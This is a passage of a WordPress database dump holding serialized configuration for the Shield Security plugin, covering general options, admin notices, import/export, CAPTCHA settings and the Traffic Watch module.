Settings\";s:12:\"sidebar_name\";s:7:\"General\";s:10:\"menu_title\";s:13:\"Configuration\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:6:\"plugin\";s:7:\"tagline\";s:23:\"General Plugin Settings\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:10;}s:13:\"admin_notices\";a:10:{s:14:\"plugin-too-old\";a:6:{s:2:\"id\";s:14:\"plugin-too-old\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:5:\"error\";}s:17:\"override-forceoff\";a:6:{s:2:\"id\";s:17:\"override-forceoff\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:15:\"plugin-disabled\";a:6:{s:2:\"id\";s:15:\"plugin-disabled\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:16:\"update-available\";a:6:{s:2:\"id\";s:16:\"update-available\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:4:\"php7\";a:6:{s:2:\"id\";s:4:\"php7\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:7:\"warning\";}s:17:\"compat-sgoptimize\";a:7:{s:2:\"id\";s:17:\"compat-sgoptimize\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:12:\"plugin_admin\";s:6:\"ignore\";s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";}s:14:\"wizard_welcome\";a:3:{s:2:\"id\";s:14:\"wizard_welcome\";s:8:\"per_user\";b:0;s:4:\"type\";s:4:\"info\";}s:26:\"plugin-mailing-list-signup\";a:4:{s:2:\"id\";s:26:\"plugin-mailing-list-signup\";s:16:\"min_install_days\";i:5;s:4:\"type\";s:5:\"promo\";s:12:\"drip_form_id\";s:9:\"250437573\";}s:14:\"allow-tracking\";a:4:{s:2:\"id\";s:14:\"allow-tracking\";s:12:\"plugin_admin\";b:1;s:16:\"min_install_days\";i:3;s:4:\"type\";s:5:\"promo\";}s:11:\"rate-plugin\";a:3:{s:2:\"id\";s:11:\"rate-plugin\";s:16:\"min_install_days\";i:30;s:4:\"type\";s:5:\"promo\";}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:16:\"section_defaults\";s:7:\"primary\";b:1;s:5:\"title\";s:15:\"Plugin Defaults\";s:11:\"title_short\";s:15:\"Plugin Defaults\";s:9:\"beacon_id\";i:389;}i:1;a:3:{s:4:\"slug\";s:30:\"section_general_plugin_options\";s:5:\"title\";s:22:\"General Plugin Options\";s:11:\"title_short\";s:15:\"General Options\";}i:2;a:4:{s:4:\"slug\";s:27:\"section_third_party_captcha\";s:5:\"title\";s:7:\"CAPTCHA\";s:11:\"title_short\";s:7:\"CAPTCHA\";s:9:\"beacon_id\";i:390;}i:3;a:4:{s:4:\"slug\";s:20:\"section_importexport\";s:5:\"title\";s:15:\"Import / Export\";s:11:\"title_short\";s:15:\"Import / Export\";s:9:\"beacon_id\";i:129;}i:4;a:3:{s:4:\"slug\";s:20:\"section_integrations\";s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";}i:5;a:3:{s:4:\"slug\";s:31:\"section_global_security_options\";s:5:\"title\";s:30:\"Global Plugin Security Options\";s:11:\"title_short\";s:14:\"Disable Shield\";}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:33:{i:0;a:10:{s:3:\"key\";s:29:\"global_enable_plugin_features\";s:7:\"section\";s:31:\"section_global_security_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:389;s:4:\"name\";s:33:\"Enable/Disable All Plugin Modules\";s:7:\"summary\";s:27:\"Global Plugin On/Off Switch\";s:11:\"description\";s:50:\"Uncheck this option to disable all Shield features\";}i:1;a:9:{s:3:\"key\";s:15:\"enable_tracking\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7i\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:28:\"Enable Information Gathering\";s:7:\"summary\";s:44:\"Permit Anonymous Usage Information Gathering\";s:11:\"description\";s:198:\"Allows us to gather information on statistics and features in-use across our client installations. This information is strictly anonymous and contains no personally, or otherwise, identifiable data.\";}i:2;a:11:{s:3:\"key\";s:16:\"enable_shieldnet\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"beacon_id\";i:437;s:9:\"link_info\";s:19:\"https://shsec.io/kb\";s:9:\"link_blog\";s:19:\"https://shsec.io/kc\";s:4:\"name\";s:16:\"Enable ShieldNET\";s:7:\"summary\";s:54:\"Enhanced Website Security Through Network Intelligence\";s:11:\"description\";s:55:\"Enhanced Website Security Through Network Intelligence.\";}i:3;a:9:{s:3:\"key\";s:13:\"show_advanced\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Show All Options\";s:7:\"summary\";s:51:\"Show All Options Including Those Marked As Advanced\";s:11:\"description\";s:122:\"Shield hides advanced options from view to simplify display. Turn this option on to display advanced options at all times.\";}i:4;a:13:{s:3:\"key\";s:22:\"visitor_address_source\";s:7:\"section\";s:16:\"section_defaults\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:14:\"AUTO_DETECT_IP\";s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:14:\"AUTO_DETECT_IP\";s:4:\"text\";s:31:\"Automatically Detect Visitor IP\";}i:1;a:2:{s:9:\"value_key\";s:11:\"REMOTE_ADDR\";s:4:\"text\";s:11:\"REMOTE_ADDR\";}i:2;a:2:{s:9:\"value_key\";s:21:\"HTTP_CF_CONNECTING_IP\";s:4:\"text\";s:21:\"HTTP_CF_CONNECTING_IP\";}i:3;a:2:{s:9:\"value_key\";s:20:\"HTTP_X_FORWARDED_FOR\";s:4:\"text\";s:20:\"HTTP_X_FORWARDED_FOR\";}i:4;a:2:{s:9:\"value_key\";s:16:\"HTTP_X_FORWARDED\";s:4:\"text\";s:16:\"HTTP_X_FORWARDED\";}i:5;a:2:{s:9:\"value_key\";s:14:\"HTTP_X_REAL_IP\";s:4:\"text\";s:14:\"HTTP_X_REAL_IP\";}i:6;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";s:4:\"text\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";}i:7;a:2:{s:9:\"value_key\";s:20:\"HTTP_INCAP_CLIENT_IP\";s:4:\"text\";s:20:\"HTTP_INCAP_CLIENT_IP\";}i:8;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SP_FORWARDED_IP\";s:4:\"text\";s:22:\"HTTP_X_SP_FORWARDED_IP\";}i:9;a:2:{s:9:\"value_key\";s:14:\"HTTP_FORWARDED\";s:4:\"text\";s:14:\"HTTP_FORWARDED\";}i:10;a:2:{s:9:\"value_key\";s:14:\"HTTP_CLIENT_IP\";s:4:\"text\";s:14:\"HTTP_CLIENT_IP\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dn\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:391;s:4:\"name\";s:18:\"Visitor IP Address\";s:7:\"summary\";s:22:\"Which Address Is Yours\";s:11:\"description\";s:85:\"There are many way to detect visitor IP addresses. Please select yours from the list.\";}i:5;a:10:{s:3:\"key\";s:24:\"block_send_email_address\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Report Email\";s:7:\"summary\";s:27:\"Where to send email reports\";s:11:\"description\";s:66:\"If this is empty, it will default to the blog admin email address.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_upgrade_admin_notice\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"In-Plugin Notices\";s:7:\"summary\";s:31:\"Display Plugin Specific Notices\";s:11:\"description\";s:105:\"Disable this option to hide certain plugin admin notices about available updates and post-update notices.\";}i:7;a:12:{s:3:\"key\";s:12:\"enable_wpcli\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i1\";s:9:\"link_blog\";s:19:\"https://shsec.io/i2\";s:9:\"beacon_id\";i:308;s:4:\"name\";s:12:\"Allow WP-CLI\";s:7:\"summary\";s:50:\"Allow Access And Control Of This Plugin Via WP-CLI\";s:11:\"description\";s:65:\"Turn off this option to disable this plugin\'s WP-CLI integration.\";}i:8;a:10:{s:3:\"key\";s:20:\"display_plugin_badge\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5v\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf20\";s:9:\"beacon_id\";i:130;s:4:\"name\";s:17:\"Show Plugin Badge\";s:7:\"summary\";s:42:\"Display Plugin Security Badge On Your Site\";s:11:\"description\";s:187:\"Enabling this option helps support the plugin by spreading the word about it on your website. The plugin badge also demonstrates to visitors that you take your website security seriously.\";}i:9;a:9:{s:3:\"key\";s:27:\"enable_xmlrpc_compatibility\";s:7:\"section\";s:16:\"section_defaults\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"XML-RPC Compatibility\";s:7:\"summary\";s:56:\"Allow Login Through XML-RPC To By-Pass Login Guard Rules\";s:11:\"description\";s:95:\"Enable this if you need XML-RPC functionality e.g. if you use the WordPress iPhone/Android App.\";}i:10;a:12:{s:3:\"key\";s:19:\"importexport_enable\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/do\";s:9:\"link_blog\";s:19:\"https://shsec.io/dp\";s:9:\"beacon_id\";i:129;s:4:\"name\";s:19:\"Allow Import/Export\";s:7:\"summary\";s:65:\"Allow Import Of Options To, And Export Of Options From, This Site\";s:11:\"description\";s:68:\"Uncheck this box to completely disable import and export of options.\";}i:11;a:10:{s:3:\"key\";s:22:\"importexport_masterurl\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Auto-Import URL\";s:7:\"summary\";s:43:\"Automatically Import Options From This Site\";s:11:\"description\";s:115:\"Supplying a valid site URL here will make this site an \'Options Slave\' and will automatically import options daily.\";}i:12;a:12:{s:3:\"key\";s:22:\"importexport_whitelist\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Export Whitelist\";s:7:\"summary\";s:68:\"Whitelisted Sites Which Do Not Need The Secret Key To Export Options\";s:11:\"description\";s:132:\"Each site on this list will be able to export options from this site without providing the secret key. Take a new line for each URL.\";}i:13;a:11:{s:3:\"key\";s:29:\"importexport_whitelist_notify\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Notify Whitelist\";s:7:\"summary\";s:59:\"Notify Sites On The Whitelist To Update Options From Master\";s:11:\"description\";s:110:\"When enabled, manual options saving will notify sites on the whitelist to export options from the Master site.\";}i:14;a:12:{s:3:\"key\";s:22:\"importexport_secretkey\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:16:\"noneditable_text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Secret Key\";s:7:\"summary\";s:24:\"Import/Export Secret Key\";s:11:\"description\";s:79:\"Keep this Secret Key private as it will allow the import and export of options.\";}i:15;a:9:{s:3:\"key\";s:20:\"delete_on_deactivate\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Delete Plugin Settings\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:16;a:10:{s:3:\"key\";s:15:\"locale_override\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/il\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Locale Override\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:17;a:11:{s:3:\"key\";s:16:\"captcha_provider\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"default\";s:10:\"grecaptcha\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:10:\"grecaptcha\";s:4:\"text\";s:19:\"Google reCAPTCHA v2\";}i:1;a:2:{s:9:\"value_key\";s:8:\"hcaptcha\";s:4:\"text\";s:8:\"hCaptcha\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:16:\"CAPTCHA Provider\";s:7:\"summary\";s:40:\"Which CAPTCHA Provider To Use Throughout\";s:11:\"description\";s:66:\"You can choose the CAPTCHA provider depending on your preferences.\";}i:18;a:12:{s:3:\"key\";s:22:\"google_recaptcha_style\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"premium\";b:1;s:7:\"default\";s:5:\"light\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:1;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:2;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:12:\"CAPTCHA Type\";s:7:\"summary\";s:49:\"How Google reCAPTCHA Will Be Displayed By Default\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}i:19;a:11:{s:3:\"key\";s:25:\"google_recaptcha_site_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:390;s:4:\"name\";s:18:\"reCAPTCHA Site Key\";s:7:\"summary\";s:67:\"Google reCAPTCHA Site Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:67:\"Enter your Google reCAPTCHA site key for use throughout the plugin.\";}i:20;a:11:{s:3:\"key\";s:27:\"google_recaptcha_secret_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:390;s:4:\"name\";s:16:\"reCAPTCHA Secret\";s:7:\"summary\";s:69:\"Google reCAPTCHA Secret Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:69:\"Enter your Google reCAPTCHA secret key for use throughout the plugin.\";}i:21;a:6:{s:3:\"key\";s:21:\"tracking_last_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:22;a:5:{s:3:\"key\";s:22:\"unique_installation_id\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}i:23;a:4:{s:3:\"key\";s:26:\"tracking_permission_set_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:24;a:5:{s:3:\"key\";s:17:\"installation_time\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:25;a:5:{s:3:\"key\";s:12:\"activated_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:26;a:5:{s:3:\"key\";s:33:\"importexport_secretkey_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:27;a:5:{s:3:\"key\";s:33:\"importexport_handshake_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:28;a:5:{s:3:\"key\";s:21:\"last_ip_detect_source\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:29;a:6:{s:3:\"key\";s:19:\"openssl_private_key\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:30;a:6:{s:3:\"key\";s:10:\"snapi_data\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:31;a:5:{s:3:\"key\";s:18:\"captcha_checked_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:3:\"int\";s:7:\"default\";i:-1;}i:32;a:5:{s:3:\"key\";s:20:\"cache_dir_write_test\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:7:{s:19:\"href_privacy_policy\";s:38:\"https://shsec.io/wpshieldprivacypolicy\";s:10:\"db_classes\";a:2:{s:5:\"geoip\";s:64:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\GeoIp\\Handler\";s:5:\"notes\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AdminNotes\\Handler\";}s:14:\"db_table_notes\";a:3:{s:4:\"slug\";s:5:\"notes\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:2:{s:11:\"wp_username\";s:39:\"varchar(255) NOT NULL DEFAULT \'unknown\'\";s:4:\"note\";s:4:\"TEXT\";}}s:14:\"db_table_geoip\";a:3:{s:10:\"autoexpire\";i:30;s:4:\"slug\";s:5:\"geoip\";s:11:\"cols_custom\";a:2:{s:2:\"ip\";s:47:\"varbinary(16) DEFAULT NULL COMMENT \'IP Address\'\";s:4:\"meta\";s:4:\"TEXT\";}}s:22:\"active_plugin_features\";a:20:{i:0;a:3:{s:4:\"slug\";s:8:\"insights\";s:13:\"load_priority\";i:1;s:13:\"menu_priority\";i:5;}i:1;a:3:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:9:\"namespace\";s:13:\"SecurityAdmin\";s:13:\"load_priority\";i:11;}i:2;a:3:{s:4:\"slug\";s:3:\"ips\";s:13:\"load_priority\";i:15;s:9:\"namespace\";s:3:\"IPs\";}i:3;a:3:{s:4:\"slug\";s:11:\"audit_trail\";s:13:\"load_priority\";i:11;s:6:\"hidden\";b:0;}i:4;a:2:{s:4:\"slug\";s:12:\"hack_protect\";s:9:\"namespace\";s:9:\"HackGuard\";}i:5;a:2:{s:4:\"slug\";s:7:\"traffic\";s:13:\"load_priority\";i:12;}i:6;a:2:{s:4:\"slug\";s:8:\"firewall\";s:13:\"load_priority\";i:1000;}i:7;a:3:{s:4:\"slug\";s:13:\"login_protect\";s:11:\"storage_key\";s:12:\"loginprotect\";s:9:\"namespace\";s:10:\"LoginGuard\";}i:8;a:1:{s:4:\"slug\";s:15:\"user_management\";}i:9;a:2:{s:4:\"slug\";s:15:\"comments_filter\";s:11:\"storage_key\";s:14:\"commentsfilter\";}i:10;a:2:{s:4:\"slug\";s:6:\"events\";s:13:\"load_priority\";i:11;}i:11;a:2:{s:4:\"slug\";s:9:\"reporting\";s:13:\"load_priority\";i:12;}i:12;a:2:{s:4:\"slug\";s:8:\"sessions\";s:13:\"load_priority\";i:5;}i:13;a:2:{s:4:\"slug\";s:12:\"integrations\";s:13:\"load_priority\";i:20;}i:14;a:2:{s:4:\"slug\";s:7:\"license\";s:13:\"load_priority\";i:10;}i:15;a:1:{s:4:\"slug\";s:11:\"autoupdates\";}i:16;a:1:{s:4:\"slug\";s:7:\"headers\";}i:17;a:1:{s:4:\"slug\";s:8:\"lockdown\";}i:18;a:1:{s:4:\"slug\";s:5:\"comms\";}i:19;a:1:{s:4:\"slug\";s:5:\"email\";}}s:6:\"events\";a:14:{s:13:\"test_cron_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:18:\"import_notify_sent\";a:1:{s:4:\"stat\";b:0;}s:22:\"import_notify_received\";a:1:{s:4:\"stat\";b:0;}s:16:\"options_exported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:16:\"options_imported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:20:\"whitelist_site_added\";a:1:{s:4:\"stat\";b:0;}s:22:\"whitelist_site_removed\";a:1:{s:4:\"stat\";b:0;}s:14:\"master_url_set\";a:1:{s:4:\"stat\";b:0;}s:17:\"recaptcha_success\";a:1:{s:5:\"audit\";b:0;}s:14:\"recaptcha_fail\";a:1:{s:5:\"audit\";b:1;}s:12:\"antibot_pass\";a:2:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;}s:12:\"antibot_fail\";a:2:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;}s:14:\"frontpage_load\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:5:\"audit\";b:0;}s:14:\"loginpage_load\";a:3:{s:7:\"offense\";b:0;s:4:\"stat\";b:0;s:5:\"audit\";b:0;}}s:7:\"wizards\";a:1:{s:7:\"welcome\";a:4:{s:5:\"title\";s:28:\"Getting Started Setup Wizard\";s:4:\"desc\";s:106:\"An introduction to this security plugin, helping you get setup and started quickly with the core features.\";s:20:\"min_user_permissions\";s:14:\"manage_options\";s:5:\"steps\";a:12:{s:7:\"welcome\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:7:\"Welcome\";}s:9:\"ip_detect\";a:1:{s:5:\"title\";s:12:\"IP Detection\";}s:24:\"admin_access_restriction\";a:1:{s:5:\"title\";s:14:\"Security Admin\";}s:11:\"audit_trail\";a:1:{s:5:\"title\";s:11:\"Audit Trail\";}s:3:\"ips\";a:1:{s:5:\"title\";s:12:\"IP Blacklist\";}s:13:\"login_protect\";a:1:{s:5:\"title\";s:16:\"Login Protection\";}s:15:\"comments_filter\";a:1:{s:5:\"title\";s:12:\"Comment SPAM\";}s:12:\"plugin_badge\";a:1:{s:5:\"title\";s:14:\"Security Badge\";}s:16:\"plugin_telemetry\";a:1:{s:5:\"title\";s:16:\"Plugin Telemetry\";}s:10:\"free_trial\";a:1:{s:5:\"title\";s:10:\"Free Trial\";}s:5:\"optin\";a:1:{s:5:\"title\";s:8:\"Join Us!\";}s:8:\"thankyou\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:10:\"Thank You!\";}}}}}s:10:\"meta_modts\";i:1628268100;}','no'),(463353,'itsec_dismissed_notices','a:1:{i:0;s:11:\"release-rcp\";}','no'),(468217,'_site_transient_shield_mod_config_c384b199040d4b4be2e980776698e0fd','a:8:{s:4:\"slug\";s:7:\"traffic\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"traffic\";s:4:\"name\";s:13:\"Traffic Watch\";s:12:\"sidebar_name\";s:7:\"Traffic\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"traffic\";s:7:\"tagline\";s:31:\"Watch All Requests To Your Site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:11:\"Traffic Log\";s:4:\"slug\";s:16:\"traffic-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:16:\"traffic-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"traffic\";}}}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:23:\"section_traffic_options\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Traffic Watch Options\";s:11:\"title_short\";s:7:\"Options\";s:9:\"beacon_id\";i:153;s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Provides finer control over the live traffic system.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:5:{s:4:\"slug\";s:23:\"section_traffic_limiter\";s:5:\"title\";s:21:\"Traffic Rate Limiting\";s:11:\"title_short\";s:13:\"Rate Limiting\";s:9:\"beacon_id\";i:420;s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Provides ability to restrict excessive requests from a single visitor.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:5:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_traffic\";s:5:\"title\";s:28:\"Enable Module: Traffic Watch\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:153;s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - The Traffic Watch module lets you monitor and review all requests to your site.\";i:1;s:103:\"Recommendation - Required only if you need to review and investigate and monitor requests to your site.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:11:{s:3:\"key\";s:14:\"enable_traffic\";s:7:\"section\";s:37:\"section_enable_plugin_feature_traffic\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ed\";s:9:\"link_blog\";s:19:\"https://shsec.io/ee\";s:9:\"beacon_id\";i:153;s:4:\"name\";s:20:\"Enable Traffic Watch\";s:7:\"summary\";s:44:\"Enable (or Disable) The Traffic Watch Module\";s:11:\"description\";s:73:\"Un-Checking this option will completely disable the Traffic Watch 